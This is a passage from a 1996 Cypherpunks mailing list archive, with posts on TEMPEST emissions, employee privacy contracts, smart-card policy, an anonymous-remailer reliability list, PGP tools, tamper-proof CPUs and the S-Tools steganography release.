From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Mon, 13 May 1996 04:58:00 +0800
To: adam@rosa.com (Adam philipp)
Subject: Re: Again: [hrdware] anti-Tempest video settings
In-Reply-To: <2.2.16.19960512030421.3ae77464@sirius.infonex.com>
Message-ID: <199605121612.CAA04055@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> >display colors that will be visible for the eye, but not for the 
> >Tempest equipment?  
> I am not an electrical engineer and do not play one in real life. However in
> my on TEMPEST I heard nothing about varying colors to reduce RF radiation
> from a monitor. Just set up a Faraday cage, much simpler.

Varying the colours does not reduce RF radiation. It just obfuscates it
by making the radation given off by the three colour beems and their
cables equal in extant (at least, far more equal). Remember the
Black button on the Black console in the Black ship that lights up Black?

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 13 May 1996 19:35:07 +0800
To: tcmay@got.net
Subject: Re: Civil liberties of employees (Re: FYB_oss)
Message-ID: <01I4N2O1M45S8Y59U9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 13-MAY-1996 00:55:07.93

>Actually, one _does_ check one's Constitutional rights "at the door" (of an
>employer), and the confusion over this issue is pervasively destroying real
>Constitutional rights.

>For instance, if I hire someone, I can require him or her to wear a
>uniform, to not wear blue jeans to work, to not smoke (or even to smoke, if
>this is what the job involves), to take off his or her clothes, to tap
>dance, to not say anything to my customers, and on and on. If the
>government required these behaviors, this would be a legitimate issue, but
>not if employers set these conditions as terms of continued employment.

	In general, I agree... but one important point to make is the contract.
If the contract says that you can require the employee to tap dance, then you
can require the employee to tap dance. If the contract _doesn't_ require the
employee to get shot, then the employee can refuse to get shot (including
shooting back if you try it anyway, bringing in law enforcement, etcetera.)
	The problem is that current contracts don't (usually) cover employee
privacy in its electronic aspects. They don't say whether or not the employer
can read your email. Thus, it's up in the air. If it says the employer can,
then the employer should be able to. If it says the employer can't, then the
employer shouldn't be able to - including via the employee using PGP to encrypt
the mail.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 13 May 1996 20:15:44 +0800
To: cypherpunks@toad.com
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <01I4N5QTJZZK8Y59U9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	It is interesting to note from the CIEC trial bulletin (which they
won't let me quote part of, according to their initial notice - stupid policy)
and other sources that the conservatives won't let people just rate
"objectionable" material in order to keep it from them. They want it off the
net/world whether or not it's rated. Thus, the idea that vznuri and others
(such as the various proponents of its current use) have that PICS can save
the net from the conservatives et al doesn't work. Nice idea (maybe), but no
cigar.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 14 May 1996 09:33:17 +0800
To: cypherpunks@toad.com
Subject: Report on Smart cards
Message-ID: <199605131336.GAA18614@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times, 13 May 1996

Smart cards poised to mark revolution in data protection

The poor image of the technology as "Big Brother's little
helper" may be altogether undeserved, says Alan Cane

The smart card -- a piece of plastic the size of a credit card
with a computer embedded in it -- offers numerous benefits,
but will force a re-evaluation of attitudes to privacy and
data protection, says Demos, the independent think-tank.

Its report, one of the first to analyse policy issues raised
by the rapid proliferation of smart cards in areas such as
finance, health and public administration, warns that the
benefits will only accrue when people are confident the
technology will not become "Big Brother s little helper", as
the authors put it.

Helpfully, Demos suggests policies to sidestep what it sees as
a "sterile confrontation" between civil libertarians and
authoritarian government and business interests in promoting
the benefits of smart cards.

"We have argued that people will trust in these technologies
when they can choose anonymity where they want it and have
greater control over the use of personal information held
about them," say the authors.

What distinguishes the smart card from other information
technologies and gives it its power is the capacity to
concentrate and manipulate a huge amount of information in a
tiny space.

A reading device is necessary to view the information, but
smart cards compute as well as store data. Software can be
incorporated to encode the data, rendering it unreadable to
anyone without the right key.

What can smart cards be used for? Their main use now is as
telephone cards for public pay-phones, but they have the
potential to identify individuals, to act as an electronic
wallet for cashless shopping, and to provide a secure and
portable information store. Medical histories could be stored
on a smart card, for example, ready for recall by a doctor.

Visionaries talk of virtually unlimited amounts of information
distributed through society in a variety of forms -- the
credit card model has been adopted for convenience rather than
because of limitations inherent in microcomputers. Badges,
pins and jewelry could all become "smart" accessories in the
future.

However, this sort of crystalgazing raises questions. For
example, what information should be stored on a smart device?
Who should be able to read it? The Demos researchers are
critical of suggestions by Michael Howard, Britain's home
secretary, that a smart card could be used as a national
identity card: a government-issued, multi-functional card,
with the populace having little or no choice about which
applications were available on the card -- and perhaps no say
about the privacy system employed.

Regulation of the privacy system -- encryption -- is
important. It is comparatively easy to devise encryption
methods which are almost impossible to break within a
reasonable period. That worries governments fearful of being
unable to unpick communications from terrorists and the like.
The US has attempted to forbid the export of the more powerful
US cryptography systems.

The Demos researchers argue that such tactics are
counter-productive. They favour a private "key escrow", a
system where cryptography users deposit the key to their
system with a trusted private registry, approved and regulated
by governments. "Government law enforcement agencies would
have to obtain a court order on the basis that they had strong
reason to believe that an individual or company that had
escrowed their keys ... was guilty of some crime".

The report proposes a radical reform of data protection
legislation through some 10 supplementary conditions. Data
users, for example, would have to get express consent from
individuals for the use to which they would want to put the
data. Rules on disclosure to third parties would be tightened,
so that data users would have to receive specific permission
from a data protection registrar in order to gain access to
specific information.

It argues that individuals should be able to choose the card
they want, and decide what information and applications will
be loaded. "Where [Michael Howard's] card is an essentially
authoritarian instrument, our proposal is for a more
market-based instrument in which the role of government is to
align the incentives within the market to ensure privacy,
trust and individual access and control," says the report.

- On the Cards, by Perri 6 and Ivan Briscoe. Demos, 9
Bridewell Place, London EC4V 6AP. UK9.95.

-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 14 May 1996 07:02:48 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199605131356.GAA13754@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@gate.net> mix cpunk latent";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 13 May 96 6:45:35 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
mix      mixmaster@remail.obscura.com     ++++++++++++  4:10:52 100.00%
alpha    alias@alpha.c2.org               +.+++++++++*    49:42  99.99%
haystack haystack@holy.cow.net            -*#*##+--++*    18:17  99.98%
exon     remailer@remailer.nl.com         *******+***#     2:48  99.98%
lead     mix@zifi.genetics.utah.edu       ++++++++++++    37:55  99.97%
amnesia  amnesia@chardos.connix.com       _. --+----++ 12:19:41  99.83%
flame    remailer@flame.alias.net         ---+---+-+++  2:44:17  99.81%
c2       remail@c2.org                    +++++++++++*    46:01  99.75%
alumni   hal@alumni.caltech.edu           #-### #*####     7:16  99.69%
vegas    remailer@vegas.gateway.com       ###**-***##*  1:07:26  99.64%
ecafe    cpunk@remail.ecafe.org           ###*###+## #     7:38  99.60%
portal   hfinney@shell.portal.com         #-## -# ####     5:07  99.57%
shinobi  remailer@shinobi.alias.net       ***+**+* +**    37:06  99.26%
penet    anon@anon.penet.fi               _ .____.     66:02:55  99.01%
replay   remailer@replay.com               +********+*     5:20  98.53%
treehole remailer@mockingbird.alias.net   ---+++-+--    2:07:49  86.55%
extropia remail@miron.vip.best.com        --.----       8:00:07  48.50%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Mon, 13 May 1996 20:40:05 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <Pine.SUN.3.93.960512211031.9265A-100000@polaris.mindport.net>
Message-ID: <Pine.3.89.9605130728.A16220-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


	Black Unicorn:

On Sun, 12 May 1996, Black Unicorn wrote:

> > everything from Scope (www.britnet.co.uk/scope). The books you find
>                   ^^^^^
> (I suggest cypherpunks so interested pursue other options).

	I figured Scope was one of those to be read if you come
	across them, but nothing earth shattering books.  The 
	catagory described as the radically wrong, but maybe they
	have a useful idea. 

        xan

        jonathon
        grafolog@netcom.com

        xan

        jonathon
        grafolog@netcom.com



**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay.Olbon@dynetics.com (Clay Olbon II)
Date: Tue, 14 May 1996 02:52:42 +0800
To: cypherpunks@toad.com
Subject: Re: Edited Edupage, 9 May 1996
Message-ID: <v01540b00adbcda0ed8ac@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 PM 5/9/96 EDT, E. ALLEN SMITH wrote:
>From:  IN%"educom@elanor.oit.unc.edu"  9-MAY-1996 22:01:14.77
>
>>REGIONAL BELLS WANT RATE HIKES FOR WIRING SCHOOLS
>>The United States Telephone Association would like to raise the average U.S.
>>monthly phone bill by about $10 over the next five years to pay for wiring
>>schools and libraries with new lines for phones and computers, and to
>>subsidize poor and rural customers.  The proposal assumes an $11 billion
>>cost for wiring schools and libraries, with local phone companies paying
>>about a third to a half of that.  The rest would come from a surcharge on
>>other services, such as cellular.  "No single industry should be held
>>responsible for fulfilling this major goal," says USTA's president.  "Each
>>has a role and should make a significant contribution to the national
>>education technology mandate."  (Investor's Business Daily 8 May 96 A7)


OK, someone tell me why the END USERS don't pay for this!

If a school wants to be wired, the local school board can pay for it (and
the local taxpayers can vote for the millage increase).  If you don't think
every five year old needs a net connection (maybe because you are afraid of
them seeing nekkid ladies, or because you just think teachers should teach
and not rely on technology to do their jobs for them), you can vote against
spending the money.

As for subsidizing rural customers, those people made a choice to live in a
rural area, for whatever reason.  I see no reason to subsidize that choice.
Unless of course they want to pay higher taxes to subsidize the costs for
my living in the city.

        Clay








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael E. Carboy" <carboy@carboy.com>
Date: Tue, 14 May 1996 10:52:39 +0800
To: Cypherpunks@toad.com
Subject: PGPShell & Eudora
Message-ID: <2.2.32.19960513154430.00685318@mail.hooked.net>
MIME-Version: 1.0
Content-Type: text/plain




While trying to solve a corrupted clearsig problem with Eudora 2.2 and
PGPShell, I noticed comments in the c-punks archives on this same problem.
I wanted to pass on that Aegis Research's PGPShell "Beta4" version solves
the problem and does "preprocess" the message before signing so that Eudora
won't wreck it.  The shell can be downloaded at  http://aegisrc.com.  It is
self-extracting and, if installed in your existing PGPShell directory will
create a subdirectory named "Pretty~1" (no, I am not kidding) and then
install the new .exe there.

Regards,
MEC


Michael E. Carboy
carboy@hooked.net
carboy@carboy.com


Key fingerprint =  C9 E9 79 12 43 76 A2 DB  1A 72 FD 04 F2 03 6F 8A 
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzDwxdIAAAEEAMmDaOXoZczvK4R7vH7ql+0sY/oHyqdtsjuOG8jbObnFjh2N
jh3TAxyXGb83xmsm6Eb6muXf6oZJdTIzO7UuSwKh+afLg6un+LU7S/VTFTUf4QNq
T1e2jZxcr33SFUxiKN7q83GkZhHyY1EeM/O8pGX+JhMANMv7gf9JSEYWhfvhAAUT
tCVNaWNoYWVsIEUuIENhcmJveSA8Y2FyYm95QGhvb2tlZC5uZXQ+iQCVAwUQMPDG
Lv9JSEYWhfvhAQF2VQQAqMj60pWt3+jZow8q/DFiM9Jw73rii2deJwfdju9vGWgU
S6Se5TegVYlti8mWLF+mRSldEnRIKZs7mycW9YlVmfxa+uM2sTceoDIACkZy1MWF
ULLeIzFDreR2YZLAVMQ4ToWTkRS2T+/jM8RQEMakPCYDIKBzCIuRQ7J+jmpR+Fs=
=79nx
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Tue, 14 May 1996 03:21:57 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <Pine.SUN.3.93.960512211031.9265A-100000@polaris.mindport.net>
Message-ID: <96May13.091247edt.20481@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Black Unicorn <unicorn@schloss.li> writes:

    > On Sun, 12 May 1996, Mixmaster wrote:
    >> if you spend $50k. Or do it yourself for $1k. Start by reading
    >> everything from Scope (www.britnet.co.uk/scope). The books you find
    >                   ^^^^^
    >> there cover everything you need to know in perfect detail.

    > Woops.  What dwindling credibility you had in my view is now gone.
    > Poof and -PLOINK-.

    > (I suggest cypherpunks so interested pursue other options).

Any particular reason why this statement lost that person's
credibility for you that you'd like to share with us?  Have someone
say, "Man, that site sucks!" is of very little use without knowing
what the problem is so we can avoid it in the future.

-Robin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay.Olbon@dynetics.com (Clay Olbon II)
Date: Tue, 14 May 1996 04:53:57 +0800
To: cypherpunks@toad.com
Subject: web proxy article in Unix Review
Message-ID: <v01540b01adbce183994c@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain



I just finished Richard Morin's Internet Notebook column in Unix Review.
This month's column was entitled "Censorship-Thwarting Tools".  It
discusses a prototype web proxy called Rover
(http://www.cfcl.com/tin/P/9606.nph-rover).  And gives some sites
(http://www.cfcl.com/tin/P/9606.rovers.html).  The best part of the article
is a discussion at the end that describes enhancements - to include
encrypted links.  It was great to see these issues discussed in a
"mainstream" computer publication.

BTW, Richard's columns are available on-line at http://www.cfcl.com/tin.
The article I referenced is 9606.  The on-line version is not as complete
as the one in Unix Review however.

        Clay






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 14 May 1996 10:36:27 +0800
To: cypherpunks@toad.com
Subject: Re: Civil liberties of employees (Re: FYB_oss)
Message-ID: <adbcb09500021004ac07@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:15 AM 5/13/96, E. ALLEN SMITH wrote:
>From:   IN%"tcmay@got.net" 13-MAY-1996 00:55:07.93
>
>>Actually, one _does_ check one's Constitutional rights "at the door" (of an
>>employer), and the confusion over this issue is pervasively destroying real
>>Constitutional rights.
>
>>For instance, if I hire someone, I can require him or her to wear a
>>uniform, to not wear blue jeans to work, to not smoke (or even to smoke, if
>>this is what the job involves), to take off his or her clothes, to tap
>>dance, to not say anything to my customers, and on and on. If the
>>government required these behaviors, this would be a legitimate issue, but
>>not if employers set these conditions as terms of continued employment.
>
>        In general, I agree... but one important point to make is the contract.
>If the contract says that you can require the employee to tap dance, then you
>can require the employee to tap dance. If the contract _doesn't_ require the

Sure, I agree that _contracts_ can make a difference. But note that
contracts are not a requirement of employment: I can, for example, hire
someone to rake my leaves. If he decides that manual labor violates his
"civil rights," I can give him the boot. No muss, no fuss, no contracts.

(But contracts are of course possible. Enforcement of the terms is another
matter. By the way, I think enforcement of such contracts should be handled
outside the normal legal system, and paid for by the parties using the
system.)

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 14 May 1996 10:12:59 +0800
To: cypherpunks@toad.com
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <199605131648.JAA12444@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:45 AM 5/13/96 EDT, E. ALLEN SMITH wrote:
>	the conservatives won't let people just rate
> "objectionable" material in order to keep it from them. They want it off the
> net/world whether or not it's rated.

In the course of channel surfing, I have once or twice come across
the Christians ranting about pornography.  They have both legitimate
and illegimate complaints, but mainly they emphasize the legitimate
complaint.  PICS addresses this legitimate complaint.

Should cut the volume down considerably, or else force them to drop
the hypocrisy, if indeed they are hypocrites.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 14 May 1996 08:32:03 +0800
To: William Ono <wmono@direct.ca>
Subject: Re: Free demo disk of "distorted number" crypto
In-Reply-To: <Pine.LNX.3.91.960510174237.399B-100000@crash.direct.ca>
Message-ID: <Pine.SCO.3.91.960513100132.6711A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 May 1996, William Ono wrote:

> On Fri, 10 May 1996, Mark O. Aldrich wrote:
> 
> > technical.  They are also offering a technical write-up via fax-back at 
> > 301.588.2162.
> 
> I just called that number, but got no answer after ten rings.  Could you 
> please verify it?

I just checked it.  It's working.  It answered with the "menu" after two 
rings.

Anyone else try using this thing?

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: draven@infi.net (Greg Morgan)
Date: Mon, 13 May 1996 22:39:18 +0800
To: Cypherpunks@toad.com
Subject: Any DLL's that handle Public Key Encryption or Key Exchange?
Message-ID: <31970890.114066924@infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm in the process of writing a freeware  IRC client in Visual Basic 3
and wanted to encorporate a secure variant of DCC chat.  Trouble is I
can't find a precompiled library that has either RSA or DH in it.
This doesn't do me much good as I don't even own a Windows C
compiler... (is that a crime in some countries? :) )

I'll appreciate any help you folks could give..

Greg Morgan
Vice President: Crescent Moon Productions
draven@infi.net
PGP Public Key via E-Mail




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Tue, 14 May 1996 01:29:36 +0800
To: perry@piermont.com
Subject: tamper proofed cpus & police states (was Re: found nym-differentiation!...)
In-Reply-To: <199605130232.WAA10281@jekyll.piermont.com>
Message-ID: <523.199605131151@olib>
MIME-Version: 1.0
Content-Type: text/plain



On tamper proofing cpus as a tool of a police state...

A cpu which was tamper proofed and had public key crypto for key
receipt (so that it could receive software which it's owner could not
decrypt), and could decrypt instructions on the fly using a symmetric
key stream cipher to execute them would be a start.

Of course this assumes that tamper proofing is ultimately possible...
but perhaps as fabrication technology progresses this might be
possible due to quantum effects (if you even look at one particle in
the internals of the cpu, it self destructs -- gross speculation as I
know next to nothing about cpu fab, but perhaps someone who does know
about chip fab would care to comment on whether the job of tamper
proofing is headed in the favour the breaker or the other way around).

Such a tamper proof cpu would also be excellent for the copyright
warriors, you would buy your copy of microsoft word, microsoft would
encrypt it for your cpus public key and send it to you.  The software
would be useless on any cpu but your own, and without breaking the
tamper proofing, or cryptanlysing the keys you wouldn't be able to
copy the software.

Still what about using software from the FSF?  Or that you wrote your
self?  Or that PRZ wrote?  How would a police state disable this?
They could make the system so that it would only run software signed
by the NSA software authorisation service :-) Any software to be
vetted and only runable on once authorised.  Development machines
would need to be strictly licensed.

But even then you could probably write PGP in microsoft word basic if
you really had to (?)  Checking for non-approved crypto in
communication beween machines would ultimately fail though because
even if a rabid police state required only standard formats you could
super encrypt or use steganography and then superencrypt in your word
basic implementation of PGP.

The legal requirement for standardised communications encodings, and
the NSA software authorisation aren't going to happen any time soon
IMO.  

Tamper resistant CPUs with public key and on the fly decryption of
memory accesses feasible I suppose for software copyright, might even
have some positive uses like providing a framework in which to embed
chaum's observers for off-line anonymous ecash.  If the option was
selectable per thread so that you could run both encrypted and normal
code on it, and when in encrypted mode it would not allow any debug
modes it would seem feasible enough for copyright purposes.

All pretty negative aspects IMO though.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)   # <- export violation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Tue, 14 May 1996 04:31:07 +0800
To: "'cypherpunks@toad.com>
Subject: S-Tools 4 now available
Message-ID: <01BB40CF.624B4A90@mirage.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

S-Tools version 4 is now available from the following URL:

  ftp://idea.sec.dsi.unimi.it/pub/security/crypt/code/s-tools4.zip

You will need either Windows 95 or Windows NT (at least v3.51) to use
this, and all further releases of S-Tools (Win32s is not sufficient).

This latest release fixes all reported bugs in v3, and adds compression
before encryption before hiding, drag-and-drop operation and a multi-
threaded working model.  Further information can be found in the on-line
help.


Regards,

- Andy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 14 May 1996 15:25:54 +0800
To: cypherpunks@toad.com
Subject: Re: Civil liberties of employees (Re: FYB_oss)
Message-ID: <2.2.32.19960513203844.006d3684@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 09:34 AM 5/13/96 -0700, Timothy C. May wrote:

>Sure, I agree that _contracts_ can make a difference. But note that
>contracts are not a requirement of employment: I can, for example, hire
>someone to rake my leaves. If he decides that manual labor violates his
>"civil rights," I can give him the boot. No muss, no fuss, no contracts.

There is an implicit contract.  Most human interactions are
conducted with implicit rather than explicit contracts, but
with contracts none the less.  Even "explicit" contracts are
usually more implicit than you might think.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 14 May 1996 15:21:48 +0800
To: cypherpunks@toad.com
Subject: Re: Civil liberties of employees (Re: FYB_oss)
Message-ID: <199605132039.NAA02439@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:34 AM 5/13/96 -0700, Timothy C. May wrote:
>Sure, I agree that _contracts_ can make a difference. But note that
>contracts are not a requirement of employment: I can, for example, hire
>someone to rake my leaves. If he decides that manual labor violates his
>"civil rights," I can give him the boot. No muss, no fuss, no contracts.

But there is a very clear contract here.  He rakes your leaves and you pay
him the agreed amount.  If he does not rake, he is in default and you don't
pay him.  If he rakes and you don't pay him, you are in default and he can
probably collect thru small claims court.

I have done consulting work here in Silicon Valley based on such contracts.
 (The value was low and I had assurance, from a mutual friend, that I was
